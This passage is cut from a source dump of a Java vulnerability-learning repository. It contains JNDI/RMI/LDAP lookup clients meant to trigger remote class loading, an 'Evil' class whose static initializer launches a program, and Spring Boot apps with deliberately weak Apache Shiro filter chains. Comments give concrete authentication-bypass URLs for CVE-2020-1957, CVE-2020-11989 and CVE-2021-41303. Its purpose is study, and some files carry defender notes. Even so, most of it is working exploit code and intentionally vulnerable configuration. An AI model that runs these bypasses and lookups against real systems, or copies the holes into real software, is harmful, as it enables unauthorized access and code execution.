        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

        return tree;
    }

}
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForJdk8u121To191.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.rmi.client;

import com.threedr3am.bug.common.server.LdapServer;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/**
 * Plain JNDI lookup against the local LDAP server — the LDAP variant used once the RMI
 * codebase trust default changed (see JndiLookupForLeJdk8u121). Any lookup whose name
 * is attacker-controlled has this effect; the mitigation is to never pass untrusted
 * strings to InitialContext.lookup and to keep the JDK current.
 *
 * @author threedr3am
 */
public class JndiLookupForJdk8u121To191 {

    static {
        // started at class load, presumably on the port in the URL below
        LdapServer.run();
    }

    /**
     * Entry point: performs the lookup and prints any failure.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        try {
            new InitialContext().lookup("ldap://127.0.0.1:43658/Calc");
        } catch (NamingException e) {
            e.printStackTrace();
        } catch (Exception e) {
            // NamingException is already caught above; this only sees other exceptions
            e.printStackTrace();
        }
    }
}
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/client/JndiLookupForLeJdk8u121.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.rmi.client;

import com.threedr3am.bug.common.server.RmiServer;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/**
 * Since JDK 8u121 the JDK has a trust mechanism for remote RMI code: unless the system
 * property com.sun.jndi.rmi.object.trustURLCodebase is set to true, remote code is not loaded
 *
 * Defender note: that property must stay at its default; setting it to true re-enables
 * remote class loading through RMI references.
 *
 * @author threedr3am
 */
public class JndiLookupForLeJdk8u121 {

    static {
        // started at class load, presumably on the port in the URL below
        RmiServer.run();
    }

    /**
     * Entry point: performs the RMI lookup and prints any failure.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        try {
            new InitialContext().lookup("rmi://127.0.0.1:43657/Calc");
        } catch (NamingException e) {
            e.printStackTrace();
        } catch (Exception e) {
            // NamingException is already caught above; this only sees other exceptions
            e.printStackTrace();
        }
    }
}
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/server/service/HelloService.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.rmi.server.service;

import java.rmi.Remote;
import java.rmi.RemoteException;

/**
 * Minimal remote interface used by the RMI server demo.
 *
 * @author threedr3am
 */
public interface HelloService extends Remote {

    /**
     * @return a greeting
     * @throws RemoteException on RMI transport failure
     */
    String sayHello() throws RemoteException;
}
--------------------------------------------------------------------------------
/rmi/src/main/java/com/threedr3am/bug/rmi/server/service/HelloServiceImpl.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.rmi.server.service;

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

/**
 * Exported implementation of {@link HelloService}; the UnicastRemoteObject constructor
 * exports the object on construction.
 *
 * @author threedr3am
 */
public class HelloServiceImpl extends UnicastRemoteObject implements HelloService {

    /**
     * @throws RemoteException if export fails
     */
    public HelloServiceImpl() throws RemoteException {
    }

    /** Prints and returns "hello!". */
    @Override
    public String sayHello() {
        System.out.println("hello!");
        return "hello!";
    }
}
--------------------------------------------------------------------------------
/security-manager/pom.xml:
--------------------------------------------------------------------------------
learn-java-bug com.xyh 1.0-SNAPSHOT 4.0.0 security-manager
--------------------------------------------------------------------------------
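/security-manager/src/main/java/com/threedr3am/bug/security/manager/CodeBaseTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.security.manager;

import java.io.FilePermission;
import java.io.IOException;
import java.security.AccessControlException;

/**
 * Exercises the installed SecurityManager against /tmp/aaa with read, write, delete and
 * execute checks and prints which ones the policy denies. Intended to be run with a
 * policy like the one in the trailing comment. Note that the SecurityManager is
 * deprecated for removal since Java 17 (JEP 411).
 *
 * @author xuanyh
 */
public class CodeBaseTest {

    /**
     * Entry point.
     *
     * @param args unused
     * @throws IOException            declared for compatibility; not thrown here
     * @throws ClassNotFoundException declared for compatibility; not thrown here
     */
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        SecurityManager sm = System.getSecurityManager();
        if (sm == null) {
            // getSecurityManager() returns null unless one is installed (e.g. via
            // -Djava.security.manager); the original then failed with NullPointerException.
            System.out.println("no SecurityManager installed");
            return;
        }
        try {
            sm.checkRead("/tmp/aaa");
        } catch (AccessControlException e) {
            System.out.println("没有权限:" + e.getMessage());
        }
        try {
            sm.checkWrite("/tmp/aaa");
        } catch (AccessControlException e) {
            System.out.println("没有权限:" + e.getMessage());
        }
        try {
            sm.checkDelete("/tmp/aaa");
        } catch (AccessControlException e) {
            System.out.println("没有权限:" + e.getMessage());
        }
        try {
            // no dedicated checkExec for files; go through the generic permission check
            sm.checkPermission(new FilePermission("/tmp/aaa","execute"));
        } catch (AccessControlException e) {
            System.out.println("没有权限:" + e.getMessage());
        }
    }
}
/**
 * grant codeBase "file:/Users/xuanyh/IdeaProjects/learnjavabug/target/classes/*" {
 *     permission java.io.FilePermission "/tmp/aaa","read";
 * };
 */
--------------------------------------------------------------------------------
/security-manager/src/main/java/com/threedr3am/bug/security/manager/Evil.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.security.manager;

import java.security.AccessController;
import java.security.PrivilegedAction;

/**
 * Runs an external program from a static initializer, i.e. merely loading this class
 * triggers it. doPrivileged only asserts the permissions of this class's own protection
 * domain, so the call succeeds only if the policy grants that code base the execute
 * permission — this is the kind of attempt the package-info describes.
 *
 * @author threedr3am
 */
public class Evil {
    static {
        AccessController.doPrivileged(new PrivilegedAction() {
            @Override
            public Object run() {
                try {
                    Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
                } catch (Throwable e) {
                    // best effort: a SecurityException here means the policy held
                    e.printStackTrace();
                }
                return null;
            }
        });
    }
}
--------------------------------------------------------------------------------
/security-manager/src/main/java/com/threedr3am/bug/security/manager/package-info.java:
--------------------------------------------------------------------------------
/**
 * CodeBaseTest briefly demonstrates use of the Java SecurityManager
 *
 * AttackTest tries several ways to bypass the Java SecurityManager and perform
 * operations beyond its permissions
 *
 * @author xuanyh
 */
package com.threedr3am.bug.security.manager;
--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-4-1/pom.xml:
--------------------------------------------------------------------------------
org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE 4.0.0 auth-bypass-shiro-1-4-1 org.apache.maven.plugins maven-compiler-plugin 7 7 org.springframework.boot spring-boot-starter-web org.apache.shiro shiro-web 1.4.1 org.apache.shiro shiro-spring 1.4.1
--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.shiro.bypass.auth;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

/** Spring Boot entry point for the Shiro 1.4.1 authentication-bypass demo. */
@SpringBootApplication
public class Application {

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

}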
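--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.shiro.bypass.auth.config;

import com.threedr3am.bug.shiro.bypass.auth.realm.MyRealm;
import java.util.LinkedHashMap;
import java.util.Map;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

/**
 * Shiro wiring for the bypass demo. The filter chain deliberately protects only the
 * exact path "/bypass" and has no catch-all ("/**") entry; that is the configuration
 * BypassTestController's note describes as bypassable on shiro <= 1.4.1. A hardened
 * configuration ends with a "/**" -> "authc" entry and upgrades Shiro.
 *
 * @author threedr3am
 */
@Configuration
public class ShiroConfig {
    @Bean
    MyRealm myRealm() {
        return new MyRealm();
    }

    @Bean
    SecurityManager securityManager() {
        DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
        manager.setRealm(myRealm());
        return manager;
    }

    /**
     * @return the filter factory with the demo's (intentionally incomplete) chain
     */
    @Bean
    ShiroFilterFactoryBean shiroFilterFactoryBean() {
        ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
        bean.setSecurityManager(securityManager());
        bean.setLoginUrl("/login");
        bean.setSuccessUrl("/index");
        bean.setUnauthorizedUrl("/unauthorizedurl");
        // Typed map instead of the raw type the original used; order matters to Shiro,
        // hence LinkedHashMap.
        Map<String, String> map = new LinkedHashMap<String, String>();
        map.put("/login", "anon");
        map.put("/bypass", "authc");
        bean.setFilterChainDefinitionMap(map);
        return bean;
    }
}
--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.shiro.bypass.auth.controller;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * Endpoint that is supposed to sit behind the "authc" filter.
 *
 * @author threedr3am
 */
@RestController
public class BypassTestController {

    /**
     * todo: in the filter configuration (see ShiroConfig) the authc mapping for bypass has
     * no trailing "/", and the mismatch between how Spring and Shiro resolve the resource
     * allows the authentication to be bypassed
     *
     * Example: configure "/bypass", "authc" and request http://localhost:8080/bypass/
     *
     * shiro <= 1.4.1
     *
     * Defender: authorize on normalized paths and end the chain with "/**" -> "authc".
     *
     * @return the literal "bypass", proving the handler ran
     */
    @RequestMapping(value = "/bypass", method = RequestMethod.GET)
    public String bypass() {
        return "bypass";
    }
}
--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.shiro.bypass.auth.controller;

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * Form login for the demo; credentials are checked by MyRealm.
 *
 * @author threedr3am
 */
@RestController
public class LoginController {

    /**
     * @param username request parameter, bound by Spring
     * @param password request parameter, bound by Spring
     * @return a success or failure message (Chinese literals kept as-is)
     */
    @RequestMapping(value = "/login", method = RequestMethod.POST)
    public String login(String username, String password) {
        Subject subject = SecurityUtils.getSubject();
        try {
            subject.login(new UsernamePasswordToken(username, password));
            return "登录成功!";
        } catch (AuthenticationException e) {
            // demo only: a stack trace per failed login is noisy in production logs
            e.printStackTrace();
            return "登录失败!";
        }

    }
}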
--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.shiro.bypass.auth.realm;

import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.AuthenticationInfo;
import org.apache.shiro.authc.AuthenticationToken;
import org.apache.shiro.authc.SimpleAuthenticationInfo;
import org.apache.shiro.authc.UnknownAccountException;
import org.apache.shiro.authz.AuthorizationInfo;
import org.apache.shiro.realm.AuthorizingRealm;
import org.apache.shiro.subject.PrincipalCollection;

/**
 * Demo realm with a single hard-coded account. Not a pattern for real systems: the
 * password is a plaintext literal in source, and no authorization data is provided.
 *
 * @author threedr3am
 */
public class MyRealm extends AuthorizingRealm {
    /** Returns null: this demo grants no roles or permissions. */
    @Override
    protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) {
        return null;
    }

    /**
     * @param token the submitted username/password token
     * @return authentication info whose stored credential Shiro compares with the token
     * @throws UnknownAccountException for any username other than "threedr3am"
     */
    @Override
    protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException {
        String username = (String) token.getPrincipal();
        if (!"threedr3am".equals(username)) {
            throw new UnknownAccountException("账户不存在!");
        }
        // plaintext expected password; the credential matcher does the comparison
        return new SimpleAuthenticationInfo(username, "123456", getName());
    }
}
--------------------------------------------------------------------------------
/shiro/auth-bypass-shiro-1-5-1/pom.xml:
--------------------------------------------------------------------------------
org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE 4.0.0 auth-bypass-shiro-1-5-1 org.apache.maven.plugins maven-compiler-plugin 7 7 org.springframework.boot spring-boot-starter-web org.apache.shiro shiro-web 1.5.1
org.apache.shiro 40 | shiro-spring 41 | 1.5.1 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.shiro.bypass.auth; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Application.class, args); 11 | } 12 | 13 | } -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.shiro.bypass.auth.controller; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RequestMethod; 5 | import org.springframework.web.bind.annotation.RestController; 6 | 7 | /** 8 | * CVE-2020-1957 9 | * 10 | * todo 通过访问 http://localhost:8080/bypass.xxxxx 或 http://localhost:8080/aaaaa/..;/bypass 绕过接口/bypass的认证控制 11 | * 12 | * * todo 漏洞点在于使用了getRequestURI 13 | * * todo The vulnerability point is in use 'getRequestURI()' 14 | * 15 | * todo /aaaaa/..;/bypass -> bypass -> ("/bypass", "authc")、("/bypass.*", "authc")、("/bypass/**", "authc") (shiro <= 1.5.1) 16 | * todo /bypass.xxxxx -> bypass -> ("/bypass", "authc")、("/bypass/**", "authc") (shiro all version) 17 | * 18 | * 有人说,实际开发不会这样配置,都是通过最后加一个("/**", "authc")全范围匹配,然而,实际上会存在某些放过的接口,例如/aaaaa/**,就能利用它进行bypass 19 | * todo /aaaaa/..;/bypass 利用存在("/aaaaa/**", "anon")去bypass ("/**", "authc") 20 | * 21 | * @author threedr3am 22 | */ 23 | @RestController 24 | public class 
BypassTestController {

    /**
     * Handles GET /bypass. The class-level Javadoc (above, in the same file)
     * explains which filter-chain definitions this endpoint is meant to be
     * protected by.
     *
     * @return the constant body "bypass1"
     */
    @RequestMapping(value = "/bypass", method = RequestMethod.GET)
    public String bypass() {
        return "bypass1";
    }
}
// ---- /shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java ----
package com.threedr3am.bug.shiro.bypass.auth.controller;

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * Form-login endpoint that authenticates the current Shiro {@link Subject}.
 *
 * @author threedr3am
 */
@RestController
public class LoginController {

    /**
     * Authenticates the caller with a username/password token.
     *
     * @param username resolved by Spring from the request parameter of the same name
     * @param password resolved the same way; arrives in plaintext in the request body
     * @return "登录成功!" on success, "登录失败!" on any AuthenticationException
     */
    @RequestMapping(value = "/login", method = RequestMethod.POST)
    public String login(String username, String password) {
        Subject subject = SecurityUtils.getSubject();
        try {
            subject.login(new UsernamePasswordToken(username, password));
            return "登录成功!";
        } catch (AuthenticationException e) {
            // All authentication failures collapse into one response body; the
            // stack trace goes to stderr, not the application log.
            e.printStackTrace();
            return "登录失败!";
        }

    }
}
// ---- /shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java ----
package com.threedr3am.bug.shiro.bypass.auth.realm;

import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.AuthenticationInfo;
import org.apache.shiro.authc.AuthenticationToken;
import
org.apache.shiro.authc.SimpleAuthenticationInfo; 7 | import org.apache.shiro.authc.UnknownAccountException; 8 | import org.apache.shiro.authz.AuthorizationInfo; 9 | import org.apache.shiro.realm.AuthorizingRealm; 10 | import org.apache.shiro.subject.PrincipalCollection; 11 | 12 | /** 13 | * @author threedr3am 14 | */ 15 | public class MyRealm extends AuthorizingRealm { 16 | @Override 17 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 18 | return null; 19 | } 20 | @Override 21 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 22 | String username = (String) token.getPrincipal(); 23 | if (!"threedr3am".equals(username)) { 24 | throw new UnknownAccountException("账户不存在!"); 25 | } 26 | return new SimpleAuthenticationInfo(username, "123456", getName()); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-5-1/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | server: 2 | port: 9999 -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-5-3/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 1.5.22.RELEASE 9 | 10 | 11 | 4.0.0 12 | 13 | auth-bypass-shiro-1-5-3 14 | 15 | 16 | 17 | org.springframework.boot 18 | spring-boot-starter-web 19 | 20 | 21 | 22 | org.apache.shiro 23 | shiro-web 24 | 1.5.2 25 | 26 | 27 | org.apache.shiro 28 | shiro-spring 29 | 1.5.2 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java: -------------------------------------------------------------------------------- 1 | package 
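me.threedr3am.bug.shiro.bypass.auth;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

/** Spring Boot entry point for this auth-bypass demo module. */
@SpringBootApplication
public class Application {

    /**
     * Boots the application context.
     *
     * @param args passed through to {@link SpringApplication#run}
     */
    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

}
// ---- /shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java ----
package me.threedr3am.bug.shiro.bypass.auth.config;

import java.util.LinkedHashMap;
import java.util.Map;
import me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

/**
 * Wires a single-realm Shiro web security manager and the servlet filter chain.
 *
 * The chain definition is deliberately minimal for the demo: only the listed
 * paths get a filter and there is no trailing ("/**", "authc") catch-all, so a
 * request path that matches none of the entries is not authenticated at all.
 * Entries live in a LinkedHashMap because Shiro evaluates chain definitions in
 * insertion order, first match wins.
 *
 * @author threedr3am
 */
@Configuration
public class ShiroConfig {
    /** @return the demo realm (see MyRealm in this module: one hard-coded account) */
    @Bean
    MyRealm myRealm() {
        return new MyRealm();
    }

    /** @return a DefaultWebSecurityManager backed by {@link #myRealm()} */
    @Bean
    SecurityManager securityManager() {
        DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
        manager.setRealm(myRealm());
        return manager;
    }

    /**
     * Builds the ShiroFilterFactoryBean with the login/success/unauthorized URLs
     * and the filter-chain map.
     *
     * @return the configured factory bean
     */
    @Bean
    ShiroFilterFactoryBean shiroFilterFactoryBean() {
        ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
        bean.setSecurityManager(securityManager());
        bean.setLoginUrl("/login");
        bean.setSuccessUrl("/index");
        bean.setUnauthorizedUrl("/unauthorizedurl");
        // Typed map instead of the raw LinkedHashMap: setFilterChainDefinitionMap
        // takes Map<String, String>; the raw form only compiled with an unchecked
        // warning. Same entries, same order.
        Map<String, String> map = new LinkedHashMap<String, String>();
        map.put("/login", "anon");
        map.put("/aaaaa/**", "anon");
        map.put("/bypass/*", "authc");
        bean.setFilterChainDefinitionMap(map);
        return bean;
    }
}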
// ---- /shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java ----
package me.threedr3am.bug.shiro.bypass.auth.controller;

import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * CVE-2020-11989
 *
 * Original notes (translated):
 * - This issue has limited practical value: systems that authenticate with Shiro
 *   almost always end the chain with a ("/**", "authc") catch-all.
 * - 1. Requesting http://localhost:8080/bypass/bypass/aaa%252Faaa (a doubly
 *   encoded "aaa/aaa") reaches this endpoint without authentication. The cause
 *   is that Tomcat decodes the URL once while Shiro decodes it twice; after the
 *   second decode the path is /bypass/bypass/aaa/aaa, which the "/bypass/*"
 *   rule no longer matches.
 * - 2. Requesting http://localhost:8080/;/bypass/bypass/111 also reaches it:
 *   Shiro truncates at the ";", so /;/bypass/bypass/111 becomes "/", which the
 *   "/bypass/*" rule does not match.
 * - Requires the module's application.yml setting: server: context-path: /bypass
 *
 * Defender's view: both cases are the filter seeing a different path than the
 * servlet container dispatches on. The fix shipped in Shiro 1.5.3; the pom of
 * this module pins shiro 1.5.2, presumably so the demo stays reproducible.
 *
 * @author threedr3am
 */
@RestController
public class BypassTestController {

    /**
     * Handles GET /bypass/{id}.
     *
     * @param id the path segment after /bypass/
     * @return "bypass1 -> " followed by the id
     */
    @RequestMapping(value = "/bypass/{id}", method = RequestMethod.GET)
    public String bypass(@PathVariable(name = "id") String id) {
        return "bypass1 -> " + id;
    }
}
// ---- /shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java ----
package me.threedr3am.bug.shiro.bypass.auth.controller;

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * Form-login endpoint that authenticates the current Shiro {@link Subject}.
 *
 * @author threedr3am
 */
@RestController
public class LoginController {

    /**
     * Authenticates the caller with a username/password token.
     *
     * @param username resolved by Spring from the request parameter of the same name
     * @param password resolved the same way; arrives in plaintext in the request body
     * @return "登录成功!" on success, "登录失败!" on any AuthenticationException
     */
    @RequestMapping(value = "/login", method = RequestMethod.POST)
    public String login(String username, String password) {
        Subject subject = SecurityUtils.getSubject();
        try {
            subject.login(new UsernamePasswordToken(username, password));
            return "登录成功!";
        } catch (AuthenticationException e) {
            // All authentication failures collapse into one response body; the
            // stack trace goes to stderr, not the application log.
            e.printStackTrace();
            return "登录失败!";
        }

    }
}
// ---- /shiro/auth-bypass-shiro-1-5-3/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java ----
package me.threedr3am.bug.shiro.bypass.auth.realm;

import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.AuthenticationInfo;
import org.apache.shiro.authc.AuthenticationToken;
import org.apache.shiro.authc.SimpleAuthenticationInfo;
import org.apache.shiro.authc.UnknownAccountException;
import org.apache.shiro.authz.AuthorizationInfo;
import org.apache.shiro.realm.AuthorizingRealm;
import org.apache.shiro.subject.PrincipalCollection;

/**
 * Single-account demo realm: authenticates only the user "threedr3am" with the
 * hard-coded password "123456" and defines no authorization data.
 *
 * NOTE(review): the password is a plaintext literal handed to Shiro's default
 * credentials matcher; a real realm would store a salted hash and configure a
 * HashedCredentialsMatcher. Fine for a demo, not a pattern to copy.
 *
 * @author threedr3am
 */
public class MyRealm extends AuthorizingRealm {
    /**
     * No roles or permissions exist in the demo.
     *
     * @return null, which AuthorizingRealm accepts as "no authorization data"
     */
    @Override
    protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) {
        return null;
    }

    /**
     * Looks up the account for the submitted token.
     *
     * @param token the submitted credentials; the principal is cast to String
     * @return authentication info carrying the stored password for the credentials matcher
     * @throws UnknownAccountException if the principal is not "threedr3am"
     */
    @Override
    protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException {
        String username = (String) token.getPrincipal();
        if (!"threedr3am".equals(username)) {
            throw new
UnknownAccountException("账户不存在!"); 25 | } 26 | return new SimpleAuthenticationInfo(username, "123456", getName()); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-5-3/src/main/resources/application.yml: -------------------------------------------------------------------------------- 1 | server: 2 | context-path: /bypass -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-7-1/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 1.5.22.RELEASE 9 | 10 | 11 | 4.0.0 12 | 13 | auth-bypass-shiro-1-7-1 14 | 15 | 16 | 8 17 | 8 18 | 19 | 20 | 21 | 22 | org.springframework.boot 23 | spring-boot-starter-web 24 | 25 | 26 | 27 | org.apache.shiro 28 | shiro-web 29 | 1.7.1 30 | 31 | 32 | org.apache.shiro 33 | shiro-spring 34 | 1.7.1 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.shiro.bypass.auth; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Application.class, args); 11 | } 12 | 13 | } -------------------------------------------------------------------------------- /shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package me.threedr3am.bug.shiro.bypass.auth.config; 2 | 3 | import 
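me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

import java.util.LinkedHashMap;
import java.util.Map;

/**
 * Wires a single-realm Shiro web security manager and the servlet filter chain.
 *
 * The chain has three entries and no ("/**", "authc") catch-all, so any path
 * that matches none of them is not authenticated at all. Entries live in a
 * LinkedHashMap because Shiro evaluates chain definitions in insertion order
 * with first match winning; note that "/bypass/*/index" is inserted before the
 * more specific "/bypass/threedr3am/index", so the exact path is claimed by the
 * authc entry first and the anon entry only applies to requests the first
 * pattern does not match.
 *
 * @author threedr3am
 */
@Configuration
public class ShiroConfig {
    /** @return the demo realm (see MyRealm in this module: one hard-coded account) */
    @Bean
    MyRealm myRealm() {
        return new MyRealm();
    }

    /** @return a DefaultWebSecurityManager backed by {@link #myRealm()} */
    @Bean
    SecurityManager securityManager() {
        DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
        manager.setRealm(myRealm());
        return manager;
    }

    /**
     * Builds the ShiroFilterFactoryBean with the login/success URLs and the
     * filter-chain map.
     *
     * @return the configured factory bean
     */
    @Bean
    ShiroFilterFactoryBean shiroFilterFactoryBean() {
        ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
        bean.setSecurityManager(securityManager());
        bean.setLoginUrl("/login");
        bean.setSuccessUrl("/index");
        // Typed map instead of the raw LinkedHashMap: setFilterChainDefinitionMap
        // takes Map<String, String>. Same entries, same order.
        Map<String, String> map = new LinkedHashMap<String, String>();
        map.put("/login", "anon");
        map.put("/bypass/*/index", "authc");
        map.put("/bypass/threedr3am/index", "anon");
        bean.setFilterChainDefinitionMap(map);
        return bean;
    }
}
// ---- /shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java ----
package me.threedr3am.bug.shiro.bypass.auth.controller;

import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
 * CVE-2021-41303
 * curl http://127.0.0.1/bypass/threedr3am/index/
 *
 * @author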
threedr3am
 */
@RestController
public class BypassTestController {

    /**
     * Handles GET /bypass/{id}/index. Which filter-chain entry applies to a
     * given request is decided in this module's ShiroConfig, not here.
     *
     * @param id the path segment between /bypass/ and /index
     * @return "bypass1 -> " followed by the id
     */
    @RequestMapping(value = "/bypass/{id}/index", method = RequestMethod.GET)
    public String bypass(@PathVariable(name = "id") String id) {
        return "bypass1 -> " + id;
    }
}
// ---- /shiro/auth-bypass-shiro-1-7-1/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java ----
package me.threedr3am.bug.shiro.bypass.auth.controller;

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

/**
